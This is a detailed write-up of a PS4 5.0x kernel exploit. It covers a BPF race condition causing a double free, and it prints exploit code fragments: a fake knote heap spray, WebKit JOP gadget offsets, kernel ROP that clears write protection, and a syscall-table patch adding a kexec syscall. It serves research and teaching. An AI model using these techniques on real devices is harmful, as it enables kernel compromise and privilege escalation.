Note: Similar to 4.55, this bug is interesting primarily for exploitation on the PS4, but it can also be used on other systems using the Berkeley Packet Filter VM if the attacker has sufficient permissions, so it's been published under the "FreeBSD" folder.
If you find any mistakes or have suggestions to improve clarity on some points, either open an issue on this repo or reply to this tweet. Thanks :)
Welcome to the 5.0x kernel exploit write-up. A few months ago, qwertyoruiopz discovered a kernel vulnerability in BPF and released an exploit for it, which involved crafting an out-of-bounds (OOB) write via a use-after-free (UAF) caused by the lack of proper locking. It was a fun bug, and a very trivial exploit. Sony then removed the write functionality from BPF, which patched that exploit. However, the core issue (the lack of locking) remained. A very similar race condition still exists in BPF past 4.55, which we will cover in detail below. The full source of the exploit can be found here.
However, this bug is no longer reachable past 5.05 firmware, because the BPF driver has finally been blocked from unprivileged processes - WebKit can no longer open it.
Sony also introduced a new security mitigation in 5.0x firmwares to prevent the stack pointer from pointing into user space; we'll go into more detail on this a bit further down.
Some assumptions are made of the reader's knowledge for the writeup. The avid reader should have a basic understanding of how memory allocators work - more specifically, how malloc() and free() allocate and deallocate memory respectively. They should also be aware that devices can be issued commands concurrently, as in, one command could be received while another one is being processed via threading. An understanding of C, x86, and exploitation basics is also very helpful, though not necessarily required.
This section contains some helpful information for those who are newer to exploitation, or are unfamiliar with device drivers or exploit techniques such as heap spraying and race conditions. Feel free to skip to the "A Tale of Two Free()'s" section if you're already familiar with this material.
There are a few ways that applications can directly communicate with the operating system. One is system calls, of which there are over 600 in the PS4 kernel; ~500 of them are FreeBSD's and the rest are Sony-implemented. Another method is through something called "Device Drivers". Drivers are typically used to bridge the gap between software and hardware devices (USB drives, keyboard/mouse, webcams, etc) - though they can also be used just for software purposes.
There are a few operations that a userland application can perform on a driver (if it has sufficient permissions) to interface with it after opening it. In some instances, one can read from it, write to it, or in some cases, issue more complex commands to it via the ioctl() system call. The handlers for these commands are implemented in kernel space - this is important, because any bugs that could be exploited in an ioctl handler can be used as a privilege escalation straight to ring0 - typically the most privileged state.
Drivers are often among the weaker points of an operating system for attackers, because sometimes these drivers are written by developers who don't understand how the kernel works, or the drivers are older and thus not wise to newer attack methods.
If we take a look around inside of WebKit's sandbox, we'll find a /dev directory. While this may seem like the root device driver path, it's a lie. Many of the drivers that the PS4 has are not exposed in this directory; for the most part, only the ones needed for WebKit's operation are. For some reason though, the BPF (aka. the "Berkeley Packet Filter") device is not only exposed to WebKit's sandbox - WebKit also has the privileges to open the device as R/W. This is very odd, because on most systems this driver is root-only (and for good reason). If you want to read more into this, refer to my previous write-up on 4.55FW.
Below is an excerpt from the 4.55 bpfwrite writeup.
Since the bug is directly in the filter system, it is important to know the basics of what packet filters are. Filters are essentially sets of pseudo-instructions that are interpreted by bpf_filter() (which runs when packets are received). While the pseudo-instruction set is fairly minimal, it allows you to do things like perform basic arithmetic operations and copy values around inside its buffer. Breaking down the BPF VM in its entirety is far beyond the scope of this write-up; just know that filter programs are run in kernel mode - this is why read/write access to /dev/bpf should be privileged.
You can reference the opcodes that the BPF VM takes here.
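To make the "pseudo-instructions" idea a bit more concrete, here is a toy interpreter for a tiny subset of classic BPF. The four opcode values follow the classic BPF encoding, but everything else (the runFilter name, the object layout, the lack of packet access and jumps) is a simplification for illustration and is not how the kernel's bpf_filter() is written.

```javascript
// Toy interpreter for a tiny subset of classic BPF (illustrative only).
const BPF_LD_IMM = 0x00;    // BPF_LD | BPF_IMM:          A = k
const BPF_ALU_ADD_K = 0x04; // BPF_ALU | BPF_ADD | BPF_K: A = A + k
const BPF_RET_K = 0x06;     // BPF_RET | BPF_K:           return k
const BPF_RET_A = 0x16;     // BPF_RET | BPF_A:           return A

// Each instruction mirrors the fields of struct bpf_insn: { code, jt, jf, k }.
function runFilter(insns) {
  let A = 0; // accumulator register
  for (let pc = 0; pc < insns.length; pc++) {
    const { code, k } = insns[pc];
    switch (code) {
      case BPF_LD_IMM: A = k >>> 0; break;
      case BPF_ALU_ADD_K: A = (A + k) >>> 0; break;
      case BPF_RET_K: return k >>> 0;
      case BPF_RET_A: return A;
      default: throw new Error("unsupported opcode 0x" + code.toString(16));
    }
  }
  throw new Error("filter fell off the end without a ret");
}

// A one-instruction filter that just returns, and a small arithmetic one.
const nopFilter = [{ code: BPF_RET_K, jt: 0, jf: 0, k: 0 }];
const addFilter = [
  { code: BPF_LD_IMM, jt: 0, jf: 0, k: 40 },
  { code: BPF_ALU_ADD_K, jt: 0, jf: 0, k: 2 },
  { code: BPF_RET_A, jt: 0, jf: 0, k: 0 },
];
```

The point to take away is that a filter is just an array of small fixed-size instructions living in a heap allocation, which is why the lifetime of that allocation matters so much later on.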
Race conditions occur when two processes/threads try to access a shared resource at the same time without mutual exclusion. The problem was ultimately solved by introducing concepts such as the "mutex" or "lock". The idea is when one thread/process tries to access a resource, it will first acquire a lock, access it, then unlock it once it's finished. If another thread/process tries to access it while the other has the lock, it will wait until the other thread is finished. This works fairly well - when it's used properly.
Locking is hard to get right, especially when you try to implement fine-grained locking for performance. One single instruction or line of code outside the locking window could introduce a race condition. Not all race conditions are exploitable, but some are (such as this one) - and they can give an attacker very powerful bugs to work with.
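Here's a small sketch of a race and its fix. JavaScript is single-threaded, so the two "threads" are simulated with generators, and every yield stands in for a point where the scheduler could switch threads. The names (unlockedIncrement, lockedIncrement, runInterleaved) are made up for this example, and the "lock" is only safe because this simulation never switches between the check and the acquire.

```javascript
// Two simulated "threads" increment a shared counter. Each yield marks a
// point where the scheduler may switch to the other thread.
function* unlockedIncrement(shared) {
  const seen = shared.value; // read
  yield;                     // preemption point between read and write
  shared.value = seen + 1;   // write back a possibly stale value
}

function* lockedIncrement(shared) {
  while (shared.locked) yield; // wait until the lock is free
  shared.locked = true;        // acquire
  const seen = shared.value;
  yield;                       // preempted while holding the lock
  shared.value = seen + 1;
  shared.locked = false;       // release
}

// Round-robin scheduler: step each thread in turn until all have finished.
function runInterleaved(threads) {
  let live = threads.slice();
  while (live.length > 0) {
    live = live.filter((t) => !t.next().done);
  }
}

function raceDemo(makeThread) {
  const shared = { value: 0, locked: false };
  runInterleaved([makeThread(shared), makeThread(shared)]);
  return shared.value;
}
```

With unlockedIncrement both threads read 0 before either writes, so one increment is lost; with lockedIncrement the second thread waits and both increments land.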
The process of heap spraying is fairly simple - allocate a bunch of memory and fill it with controlled data in a loop and pray your allocation doesn't get stolen from underneath you. It's a very useful technique when exploiting something such as a use-after-free, as you can use it to get controlled data into your target object's backing memory.
By extension, it's useful to do this for a double free() as well, because once we have a stale reference, we can use a heap spray to control the data. Since the object will be marked "free", the allocator will eventually provide us with control over this memory, even though something else is still using it. That is, unless something else has already stolen the pointer from you and corrupted it - then you'll likely get a system crash, and that's no fun. This is one factor that adds to the variance of exploits, and typically, the smaller the object, the more likely this is to happen.
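As a rough sketch of why spraying works, here's a toy fixed-size allocator with a last-in-first-out free list. The ToyHeap class and sprayDemo function are invented for this example; the real kernel allocator is far more involved, but the "most recently freed chunk gets handed out again" behaviour is the part we care about.

```javascript
// Toy fixed-size allocator with a LIFO free list (illustrative only).
class ToyHeap {
  constructor(chunkCount) {
    this.chunks = Array.from({ length: chunkCount }, () => ({ data: null }));
    this.freeList = this.chunks.map((_, i) => i); // indices of free chunks
  }
  alloc(data) {
    const idx = this.freeList.pop(); // most recently freed chunk comes first
    if (idx === undefined) throw new Error("out of memory");
    this.chunks[idx].data = data;
    return idx;
  }
  free(idx) {
    this.freeList.push(idx);
  }
  read(idx) {
    return this.chunks[idx].data;
  }
}

function sprayDemo() {
  const heap = new ToyHeap(8);
  const victim = heap.alloc("legit object"); // something else still uses this
  heap.free(victim);                         // ...but it gets freed anyway
  // Spray: allocate several chunks filled with attacker-controlled data.
  for (let i = 0; i < 4; i++) heap.alloc("controlled data");
  return heap.read(victim); // the stale reference now sees our data
}
```

In this toy nothing else is allocating, so the very first spray allocation reclaims the victim chunk. On a real system other allocations compete for it, which is where the variance comes from.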
Via the ioctl() system call, a user can set a filter program on a given descriptor with commands such as BIOCSETWF. There are other commands to set other filters, however the write filter is the only one interesting to us for this writeup. An important part of the previous exploit was the power to free() an older filter once a new one has been allocated, via bpf_setf(), which is called directly by BIOCSETWF's command handler. This allowed us to free() a filter while it was in use. This free() in itself is also a bug that can be exploited, and is leveraged in the newer exploit. Let's take a look at bpf_setf() again.
static int bpf_setf(struct bpf_d *d, struct bpf_program *fp, u_long cmd)
{
    struct bpf_insn *fcode, *old;
    // ...
    if (cmd == BIOCSETWF) {
        old = d->bd_wfilter; // <----- THIS ISN'T LOCKED :)
        wfilter = 1;
    }
    // ...
    if (fp->bf_insns == NULL) {
        // ...
        BPFD_LOCK(d);
        // ...
        BPFD_UNLOCK(d);
        if (old != NULL)
            free((caddr_t)old, M_BPF);
        return (0);
    }
    // ...
}
We can see that there are variables on the stack to hold filter pointers, including one for the old filter, which eventually gets free()'d. If the ioctl command is BIOCSETWF, the pointer from d->bd_wfilter is copied to the old stack variable.
Later on, we can see that they lock the BPF descriptor and null the references to the filters. They lock the reference clearing, but what about the copy of d->bd_wfilter to the stack? As we've seen in previous exploits, multiple threads can run and use the same bpf_d object. If we were to race setting two filters in parallel, there's a chance that both threads will copy the same pointer to their kernel stacks, eventually resulting in a double free as both copies will be passed to free().
With a double free() primitive, we have the ability to achieve memory corruption on the kernel heap by poisoning the memory allocator. This essentially allows us to create a targeted use-after-free (UAF) on an object allocated post-corruption.
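The race and the resulting allocator poisoning can be modelled in a few lines. This is only a sketch: the two "threads" are generators stepped by hand, the heap is a bare LIFO free list, and makeToyHeap, setWriteFilter and the pointer values are all made up. Only the shape of the bug (an unlocked read of bd_wfilter followed by free(old)) comes from the bpf_setf() excerpt.

```javascript
// Bare-bones heap: a LIFO free list plus a log of every free() call.
function makeToyHeap() {
  const freeList = [];
  const freeLog = [];
  return {
    freeLog,
    free(ptr) { freeLog.push(ptr); freeList.push(ptr); },
    malloc() { return freeList.pop(); },
  };
}

// Models the racy part of bpf_setf(): read the old filter pointer without
// the lock, then (later) swap in the new filter and free the old one.
function* setWriteFilter(heap, d, newFilter) {
  const old = d.bd_wfilter; // unlocked read, as in the excerpt
  yield;                    // the other thread can run here
  d.bd_wfilter = newFilter; // done under BPFD_LOCK in the real code
  if (old !== null) heap.free(old);
}

function doubleFreeDemo() {
  const heap = makeToyHeap();
  const d = { bd_wfilter: 0x1000 }; // descriptor with an existing filter
  const t1 = setWriteFilter(heap, d, 0x2000);
  const t2 = setWriteFilter(heap, d, 0x3000);
  t1.next(); t2.next(); // both threads copy 0x1000 into their `old`
  t1.next(); t2.next(); // both threads free it
  // The poisoned free list now hands the same chunk to two different owners.
  const a = heap.malloc();
  const b = heap.malloc();
  return { freed: heap.freeLog, a, b };
}
```

Two later allocations returning the same address is exactly the situation we want: one of them can be a kernel object we target, and the other can be our spray data.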
Similar to 1.76, the target object used for this exploit was the knote object. The knote object is used to represent a kernel event in memory, and knotes are linked together in a singly linked list. kqueue objects represent the event queues that raise these events, and knote lists are managed by the kqueue they are in. Qwerty chose knote because of knote lists (called knlist), as they give us some degree of control over the size. Let's take a look at the structure (macros have been omitted for brevity's sake).
struct knote {
    SLIST_ENTRY(knote) kn_link;     /* for kq */
    SLIST_ENTRY(knote) kn_selnext;  /* for struct selinfo */
    struct knlist *kn_knlist;       /* f_attach populated */
    TAILQ_ENTRY(knote) kn_tqe;
    struct kqueue *kn_kq;           /* which queue we are on */
    struct kevent kn_kevent;
    int kn_status;                  /* protected by kq lock */
    int kn_sfflags;                 /* saved filter flags */
    intptr_t kn_sdata;              /* saved data field */
    union {
        struct file *p_fp;          /* file data pointer */
        struct proc *p_proc;        /* proc pointer */
        struct aiocblist *p_aio;    /* AIO job pointer */
        struct aioliojob *p_lio;    /* LIO job pointer */
    } kn_ptr;
    struct filterops *kn_fop;       // <--- Of interest as an attacker, offset: 0x68
    void *kn_hook;
    int kn_hookid;
};
There's an interesting field there, struct filterops *kn_fop at offset 0x68. This points to a table of function pointers that is referenced when something happens with the event, such as an attach or detach. The f_detach function pointer will be dereferenced and called when the kqueue, and by extension the knote, is being destroyed.
struct filterops {
    int f_isfd;
    int (*f_attach)(struct knote *kn);
    void (*f_detach)(struct knote *kn);
    int (*f_event)(struct knote *kn, long hint);
    void (*f_touch)(struct knote *kn, struct kevent *kev, u_long type);
};
By corrupting the f_detach function pointer, hijacking of the instruction pointer, and thus arbitrary code execution, can be achieved when the object is destroyed via the destruction of the corrupted kqueue.
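A quick model of the hijack, with JavaScript objects standing in for kernel structures. The field names kn_fop and f_detach come from the structs above; closeKqueue, legitOps, fakeOps and the tag field are hypothetical, and the "memory corruption" is just a plain assignment.

```javascript
// Toy model: closing a kqueue calls kn->kn_fop->f_detach(kn) for each knote.
function closeKqueue(kq) {
  const results = [];
  for (const kn of kq.knotes) {
    results.push(kn.kn_fop.f_detach(kn)); // indirect call through the table
  }
  return results;
}

const legitOps = { f_detach: (kn) => "legit detach" };
const fakeOps = { f_detach: (kn) => "attacker code, arg=" + kn.tag };

function hijackDemo() {
  const kn = { tag: "knote", kn_fop: legitOps };
  const kq = { knotes: [kn] };
  // The heap corruption is modelled as a plain overwrite of kn_fop.
  kn.kn_fop = fakeOps;
  return closeKqueue(kq)[0];
}
```

Note that the hijacked function still receives the knote as its argument. In the real exploit this is what gives us control of rdi, since the "knote" is really our sprayed data.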
Our exploit strategy is targeting a UAF on the knote object to hijack the instruction pointer. Let's break down the steps/stages for successful exploitation.
- Open BPF descriptors, set up one NOP filter and one filter for heap spraying
- Set up the fake knote object in WebKit's heap for JOP
- Set up the kernel ROP chain
- Start thread one
- Start thread two
Thread 1 will do the following actions:
- Create a kqueue via sys_kqueue()
- Set a filter on the device in an attempt to poison the allocator
- Trigger a kevent
- Perform a heap spray in an attempt to achieve memory corruption
- Close the kqueue (attempt to achieve code execution)
Thread 2 will simply continuously attempt to set a write filter.
At some point in 5.0x, it seems Sony added some mitigation into the scheduler to check the stack pointer against userland addresses when running in kernel context, similar to the increasingly common "Supervisor Mode Access Prevention" (SMAP) mitigation found on modern systems. This turned an otherwise fairly trivial exploit into some complex kernel memory manipulation to run a kernel ROP (kROP) chain. To my knowledge this hasn't been investigated very much, but attempting a simple stack pivot like we've done in previous exploits into userland memory will crash the kernel.
To avoid this, we need to get our ROP chain into kernel memory. To do this, qwerty decided to go with the method he used on the iPhone 7 - essentially using JOP to push a bunch of stack frames onto the kernel stack, and memcpy()'ing the chain to the address held in RSP.
You can find a detailed annotation of the exploit here to assist in understanding it, as it does get quite complex.
Software engineers have started getting wise to stack pivot techniques, and preventing the attacker from pivoting the stack into user-controlled memory is a pretty decent counter-measure. However, like everything, it is bypassable. JOP (jump oriented programming) is one way. You could use JOP to implement a full chain, or use it as a method of getting to ROP by getting your ROP chain into kernel memory. The latter is preferred, because implementing logic in JOP (while possible) can be a nightmare.
Return Oriented Programming (ROP) is essentially the process of creating a fake stack, writing the addresses of gadgets to it, and pivoting RSP to it. Your chain of gadgets is then executed like a real call stack, and every time a ret instruction is hit, the next gadget in the chain is run.
Jump Oriented Programming (JOP) works a bit differently. Instead of ending your gadgets with a ret instruction, you end your gadgets with a jmp instruction. As long as you control the destination (maybe there's a register you can influence the value of), you can chain it with other gadgets, without needing a fake stack. For instance, if you control the value of rax, your gadget can end with jmp rax. By setting the value of rax to the address of the next gadget, you can chain them.
With JOP you generally have to get more creative, because you're even more limited on potential gadgets - this is why implementing full chains in JOP is not preferred.
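To illustrate the chaining idea, here's a toy "JOP machine". The gadget addresses, the register set and the table-driven dispatch are all invented for this sketch; real gadgets are whatever instruction sequences you can find, and they rarely line up this neatly.

```javascript
// Toy JOP machine: each "gadget" does a little work, then loads the next
// target into rax from a table we control and jumps to it.
const GADGET_ADD = 0x1000; // rbx += 1; rax = table[rdi]; rdi += 1; jmp rax
const GADGET_DBL = 0x2000; // rbx *= 2; rax = table[rdi]; rdi += 1; jmp rax
const HALT = 0x0;          // sentinel target that stops the machine

function runJop(entry, table) {
  const regs = { rax: entry, rbx: 0, rdi: 0 };
  // Load the next jump target from attacker-controlled memory.
  const dispatch = () => { regs.rax = table[regs.rdi++]; };
  const gadgets = {
    [GADGET_ADD]: () => { regs.rbx += 1; dispatch(); },
    [GADGET_DBL]: () => { regs.rbx *= 2; dispatch(); },
  };
  while (regs.rax !== HALT) gadgets[regs.rax](); // "jmp rax"
  return regs.rbx;
}
```

For example, runJop(GADGET_ADD, [GADGET_DBL, GADGET_DBL, GADGET_ADD, HALT]) runs add, double, double, add. There is no stack involved at any point; control flow is driven entirely by the values we place in the table and registers.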
Now that we've covered the basics of what the exploit is and the basics of JOP, we'll start through the process of exploiting the bug. The first thing we need to do is set up a fake knote object to spray the heap with. Luckily, faking this object is easy: there's no need to fake a bunch of members for stability, we only need to fake a few members along with kn_fop, our target member. The ctxp buffer is used to set up our fake knote.
var ctxp = p.malloc32(0x2000); // ctxp = knote
p.write8(ctxp.add32(0), ctxp2); // 0x00 = kn_link - not important for kqueue per se, but for the JOP gadget
p.write8(ctxp.add32(0x50), 0); // 0x50 = kn_status = 0 (clear flags so detach is called)
p.write8(ctxp.add32(0x68), ctxp1); // 0x68 = kn_fop
Notice that we've set kn_fop to ctxp1 - this is the buffer for the fake filterops function table. The only thing we need to fake in this table is kn_fop->f_detach(), because this is the only function that will be called on kqueue destruction.
var ctxp1 = p.malloc32(0x2000); // ctxp1 = knote->kn_fop
p.write8(ctxp1.add32(0x10), offsetToWebKit(0x12A19CD)); // JOP gadget
As you can see, this is where we achieve arbitrary code execution, and we're directing RIP to 0x12A19CD in WebKit. Here's an x86 snippet of the relevant code for kqueue_close() - where control of the instruction pointer is achieved.
; Note: R14 = ctxp
seg000:FFFFFFFF89D29861 test byte ptr [r14+50h], 8 ; we set ctxp+0x50 to 0, so we're good
seg000:FFFFFFFF89D29866 jnz short loc_FFFFFFFF89D29872 ; irrelevant
seg000:FFFFFFFF89D29868 mov rax, [r14+68h] ; r14 + 0x68 = ctxp1
seg000:FFFFFFFF89D2986C mov rdi, r14 ; rdi = r14 = ctxp, and [ctxp + 0x00] = ctxp2
seg000:FFFFFFFF89D2986F call qword ptr [rax+10h] ; JOP gadget
Also notice that we control the rdi register here via the r14 register. Under normal circumstances, the knote object kn is loaded into rdi as it's the first argument to kn->kn_fop->f_detach() - however, because we have corruption on the knote, we control not only where we jump to, but also the argument. This is important for JOP, because the next jump in the first JOP gadget requires us to have control of the RDI register.
To make some space on the stack, we can use a JOP chain. We'll use the variable stackshift_from_retaddr to track how much we've pushed on the stack. First we'll run a function prologue, which will subtract from RSP, creating space for us to put our ROP chain into. This function prologue is our first JOP gadget at 0x12A19CD, which we set up previously in the fake knote that we sprayed.
seg000:00000000012A19CD sub rsp, 58h
seg000:00000000012A19D1 mov [rbp-2Ch], edx
seg000:00000000012A19D4 mov r13, rdi
seg000:00000000012A19D7 mov r15, rsi
seg000:00000000012A19DA mov rax, [r13+0]
seg000:00000000012A19DE call qword ptr [rax+7D0h] // Implicitly subs 0x8 from rsp
At this point, we're 0x60 away from the original stack pointer (0x58 from the sub, plus 0x8 for the return address pushed by the call). Now remember, for JOP to work, we need to be able to control where code jumps next, which means we have to control rax. Luckily, we can see rax is loaded from r13+0, and r13 is set from rdi. As detailed above, we control rdi via the corrupted knote object. If we look at the previous section where the JOP gadget is called from the kernel, rdi points to ctxp, whose first quadword we set to ctxp2, so rax ends up holding ctxp2. The address of the next gadget will be read from ctxp2 + 0x7D0, which we will set to 0x6EF4E5.
p.write8(ctxp2.add32(0x7d0), offsetToWebKit(0x6EF4E5));
seg000:00000000006EF4E5 mov rdi, [rdi+10h]
seg000:00000000006EF4E9 jmp qword ptr [rax]
This gadget will allow us to set rdi to a new value, and jump to the address stored at rax, which still holds the address of ctxp2. Notice that this gadget allows us to loop, because we can write the address of the first gadget to ctxp2, and control where the first gadget calls next through the new rdi loaded from rdi + 0x10.
var iterbase = ctxp2;
for (var i = 0; i < 0xf; i++) { // loop 15 times
    p.write8(iterbase, offsetToWebKit(0x12A19CD)); // first JOP gadget
    stackshift_from_retaddr += 8 + 0x58; // return address pushed by call + sub rsp, 0x58
    p.write8(iterbase.add32(0x7d0 + 0x20), offsetToWebKit(0x6EF4E5)); // second JOP gadget
    p.write8(iterbase.add32(8), iterbase.add32(0x20));
    p.write8(iterbase.add32(0x18), iterbase.add32(0x20 + 8));
    iterbase = iterbase.add32(0x20); // setup next loop
}
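As a sanity check on the numbers, the stack consumed by the looped gadget can be worked out from the first gadget's listing alone. This sketch only counts the 15 passes set up by the loop; stackShift and the constant names are made up for the example.

```javascript
// Stack consumed by one pass of the first JOP gadget, per its listing.
const SUB_RSP = 0x58;    // sub rsp, 58h
const CALL_PUSH = 0x8;   // call pushes an 8-byte return address
const LOOP_PASSES = 0xf; // the setup loop chains 15 passes

function stackShift(passes) {
  return passes * (SUB_RSP + CALL_PUSH);
}
```

stackShift(1) is 0x60 and stackShift(LOOP_PASSES) is 0x5A0, which is the amount of room the loop opens up below the original stack pointer for the memcpy() destination.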
Now that we've created space on the stack, we want to copy our kernel ROP chain into it to get executed. Let's take a look at memcpy()'s function signature:
void *memcpy(void *destination, const void *source, size_t num);
As defined in the System V AMD64 ABI (Application Binary Interface), which FreeBSD uses on x64, the following registers are used to pass integer and pointer arguments to functions:
rdi - first argument
rsi - second argument
rdx - third argument
rcx - fourth argument
r8 - fifth argument
r9 - sixth argument
[stack] - seven+ arguments
Therefore, the following registers are interesting to us for this memcpy call:
rdi (memory destination pointer)
rsi (memory source pointer)
rdx (size in bytes)
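The mapping from arguments to registers is mechanical, which a tiny helper can show. assignArgs and the placeholder values are hypothetical; only the register order comes from the ABI.

```javascript
// Integer/pointer argument registers, in System V AMD64 order.
const ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"];

// Map positional arguments to registers; anything past six goes on the stack.
function assignArgs(args) {
  const regs = {};
  const stack = [];
  args.forEach((value, i) => {
    if (i < ARG_REGS.length) regs[ARG_REGS[i]] = value;
    else stack.push(value);
  });
  return { regs, stack };
}

// memcpy(destination, source, num) with placeholder values.
const memcpyCall = assignArgs(["dst", "src", 0x100]);
```

So for our memcpy() call, each JOP gadget we pick only has to load one of rdi, rsi or rdx, and nothing needs to be placed on the stack.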
The first thing we'll do is load RDX for the size. We can do this via another JOP gadget in WebKit at 0x15CA41B.
seg000:00000000015CA41B mov rdx, [rdi+0B0h]
seg000:00000000015CA422 call qword ptr [rdi+70h]
We can write relative to RDI via the rdibase variable. By adding our shift plus 0x28 (offset for where we're writing on the stack), we can load RDX with our chain length.
Next we'll load the source pointer in RSI. We want this to point to where we're writing our kernel ROP chain in userland. Similar to when we set the size, we'll again look for a JOP gadget that can set RSI from memory relative to RDI. The gadget in WebKit at 0x1284834 does the trick.
seg000:0000000001284834 mov rsi, [rdi+8]
seg000:0000000001284838 mov rdi, [rdi+18h]
seg000:000000000128483C mov rax, [rdi]
seg000:000000000128483F call qword ptr [rax+30h]
Finally, we need to set up RDI so that it points to all of the fake stack frames that we pushed on the kernel stack. This turns out to be at RBP (base pointer) - 0x28. We can use another JOP gadget at 0x272961.
seg000:0000000000272961 lea rdi, [rbp-28h]
seg000:0000000000272965 call qword ptr [rax+40h]
Now that the arguments are set up, we need to call memcpy(). Notice from our last JOP gadget that the next place we jump to is read from [rax + 0x40]. This is where we want to write the address of memcpy() from userland. We'll skip the function prologue and optimizations to avoid side-effects produced from our previous JOP gadgets.
p.write8(raxbase.add32(0x40), memcpy.add32(0xC2 - 0x90)); // skip prolog covering side effecting branch and skipping optimizations
var topofchain = stackshift_from_retaddr + 0x28;
p.write8(rdibase.add32(0xB0), topofchain);
It was suggested to me that I should include a section containing some details on complications that occurred. We've already detailed one of them, being the SMAP-like implementation, however another was the lack of debugging. At this point in time, we didn't have a kernel debugging framework set up for working with the PS4. We did however have the ability to patch the kernel to enable UART and "verbose panic" information if we had an existing kernel exploit working. Of course though, once the system reboots, those patches are gone, and we no longer have access to UART or verbose panic info.
Panic information that's printed to the klog/UART can be a very helpful tool for debugging exploits (which is probably why Sony has it disabled in the first place). Below is an example of a standard page fault panic from klog:
Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 01
fault virtual address = 0xffffde1704254000
fault code = supervisor read instruction, protection violation
instruction pointer = 0x20:0xffffde1704254000
stack pointer = 0x28:0xffffff807119b220
frame pointer = 0x28:0xffffff807119b2b0
code segment = base 0x0, limit 0xfffff, type 0x1b
= DPL 0, pres 1, long 1, def32 0, gran 1
processor eflags = interrupt enabled, resume, IOPL = 0
current process = 87 (infloopThr)
As you can see, some information here is extremely useful, especially the virtual address and the instruction pointer.
This information is fantastic when the system actually gives it to us. However, there are some cases where the system won't. Often this seems to be because the crash happens in a critical section, such as inside free() directly. For more information on critical sections, see Critical Sections.
Other times, the reason we don't get this information is unknown. If the panic information is unobtainable for us because we either don't have an existing exploit or the information just won't get printed to the klog, other tricks must be used, such as using infloop gadgets and other "hacky" exploit debugging techniques.
Now that we have the ability to run kernel ROP chains due to our stack manipulation sorcery described in the last section, we can apply kernel patches after we disable kernel write protection via the cr0 register. We can do this by just clearing the write-protection (WP) bit at bit 16.
krop.push(window.gadgets["pop rsi"]);
krop.push(new int64(0xFFFEFFFF, 0xFFFFFFFF)); // Clear WP bit (bit 16)
krop.push(window.gadgets["and rax, rsi"]);
krop.push(window.gadgets["mov rdx, rax"]);
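The mask constant in the chain can be derived rather than memorised. Here's a small sketch using BigInt; the helper names are made up, the sample cr0 value in the usage note is just a typical-looking one, and the (low, high) argument order for int64 is an assumption based on how the constant is written in the chain.

```javascript
// CR0.WP is bit 16. ANDing with the inverted bit clears it.
const CR0_WP = 1n << 16n;
const MASK64 = (1n << 64n) - 1n;
const WP_CLEAR_MASK = ~CR0_WP & MASK64; // 0xFFFFFFFFFFFEFFFF

function clearWriteProtect(cr0) {
  return cr0 & WP_CLEAR_MASK;
}

// Split a 64-bit value into 32-bit halves, assuming int64(low, high) order.
function toHalves(value) {
  return [Number(value & 0xFFFFFFFFn), Number(value >> 32n)];
}
```

toHalves(WP_CLEAR_MASK) gives [0xFFFEFFFF, 0xFFFFFFFF], matching the int64 pushed in the chain, and clearWriteProtect(0x80050033n) gives 0x80040033n: only bit 16 changes.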
For brevity's sake, I won't cover all the patches in detail, however here's a brief recap of the patches made in the ROP chain.
sys_setuid syscall - remove permission check
sys_mmap syscall - allow RWX mapping
amd64_syscall - syscall instruction allowed anywhere
sys_dynlib_dlsym syscall - allow dynamic resolving from anywhere
The main goal of the chain is to install our own system call called kexec. This will allow us to execute arbitrary code in kernel mode easily from any application, no matter the privileges.
sys_kexec(void *code, void *uap);
Code such as jailbreaking and HEN is run via kexec. Installing it is fairly easy; we just have to add an entry to sysent.
struct sysent {                 /* system call table */
    int sy_narg;                /* number of arguments */
    sy_call_t *sy_call;         /* implementing function */
    au_event_t sy_auevent;      /* audit event associated with syscall */
    systrace_args_func_t sy_systrace_args_func;
                                /* optional argument conversion function. */
    u_int32_t sy_entry;         /* DTrace entry ID for systrace. */
    u_int32_t sy_return;        /* DTrace return ID for systrace. */
    u_int32_t sy_flags;         /* General flags for system calls. */
    u_int32_t sy_thrcnt;
};
By setting sy_call to a jmp qword ptr [rsi] gadget (which can be found in the kernel at offset 0x13460), sy_narg to 2, and the final quadword of the entry to 0x100000000 (given the struct layout above, this leaves sy_flags at 0 and sets sy_thrcnt to 1, which is SY_THR_STATIC), we can successfully insert a custom system call that executes code in ring0.
seg000:FFFFFFFF8AC38820 dq 2 ; Syscall #11
seg000:FFFFFFFF8AC38828 dq 0FFFFFFFF89BCF460h
seg000:FFFFFFFF8AC38830 dq 0
seg000:FFFFFFFF8AC38838 dq 0
seg000:FFFFFFFF8AC38840 dq 0
seg000:FFFFFFFF8AC38848 dq 100000000h
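To see how the six quadwords in the dump map onto struct sysent, here's a sketch that builds the same entry in a buffer. The offsets are derived from the struct above assuming natural alignment on amd64 (they are not read from a kernel), and buildSysent and asQwords are made-up helper names.

```javascript
// Build a 0x30-byte sysent entry, assuming natural amd64 alignment.
const SYSENT_SIZE = 0x30;
const OFF_NARG = 0x00; // int sy_narg (padded to 8 bytes)
const OFF_CALL = 0x08; // sy_call_t *sy_call
const OFF_TAIL = 0x28; // last 8 bytes: sy_flags (low 4) + sy_thrcnt (high 4)

function buildSysent(narg, syCall, tail) {
  const view = new DataView(new ArrayBuffer(SYSENT_SIZE));
  view.setInt32(OFF_NARG, narg, true); // little-endian
  view.setBigUint64(OFF_CALL, syCall, true);
  view.setBigUint64(OFF_TAIL, tail, true);
  return view;
}

// Values taken from the dump of syscall #11.
const kexecEntry = buildSysent(2, 0xFFFFFFFF89BCF460n, 0x100000000n);

// Read the entry back as six quadwords, matching the dq lines in the dump.
function asQwords(view) {
  const out = [];
  for (let off = 0; off < SYSENT_SIZE; off += 8) {
    out.push(view.getBigUint64(off, true));
  }
  return out;
}
```

Reading kexecEntry back with asQwords gives 2, the gadget address, three zero quadwords, and 0x100000000, the same six values as the dump. Under this layout the 32-bit word at offset 0x2C (sy_thrcnt) is 1.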
Again, not a real patch, but a Sony patch - though this time more effective. Opening BPF has been blocked for unprivileged processes such as WebKit and other apps/games. It's still present in the sandbox, however attempting to open it will fail and yield EPERM.
Another cool bug to exploit. It should have been a trivial exploit, however Sony's new mitigation that prevents exploit devs from pivoting RSP into userland memory while in kernel context is quite effective, and some tricks had to be used to get the chain into kernel memory - but as demonstrated, it is beatable. This exploit is also a good example of how double free()'s can be exploited fairly easily on FreeBSD if they're on an object of decent size.
TheFloW - Suggestions and Feedback
qwertyoruiopz : Detailed Annotation
qwertyoruiopz : Zero2Ring0 Slides
Watson FreeBSD Kernel Cross Reference
Marco Ramilli : From ROP to JOP